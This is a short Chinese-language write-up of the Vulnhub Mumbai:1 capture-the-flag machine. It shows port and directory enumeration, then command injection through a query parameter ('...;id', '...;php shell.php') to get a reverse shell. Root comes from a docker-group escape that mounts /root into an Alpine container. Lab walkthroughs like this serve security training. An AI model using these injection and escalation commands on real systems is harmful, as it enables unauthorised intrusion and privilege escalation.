Mumbai:1 Vulnhub Walkthrough

靶机地址：

https://www.vulnhub.com/entry/mumbai-1,372/

主机探测：

主机端口扫描：

FTP 下载Note文件

TODO:

Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.

Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.

- AbsoZed

意思就是可以使用docker来进行提权，因为HTTP使用的是docker容器跑的

HTTP目录扫描

http://10.10.203.18/drupal/

列目录为空

http://10.10.203.18/wordpress/ 无法访问

在枚举HTTP 8000端口

dirb http://10.10.203.18:8000 -X .php,.txt,.json,.xml,.py,.yml

+ http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
+ http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)

下载两个文件查看内容

test.php文件内容

Please POST a proper query. ex: https://caffeinatedengineers.com

keywords.py py脚本就是发送请求给URL

尝试请求下几个有用的URL

|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ＞curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]

root at Hack404 in ~
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ＞curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)

本地监听1234

执行：curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php

获取shell，尝试提权操作

docker run -v /root:/mnt -it alpine

# cd /root/
cd /root/
~ # cd /mnt
cd /mnt
/mnt # ls
ls
proof.txt
/mnt # cat proof.txt

OVER !!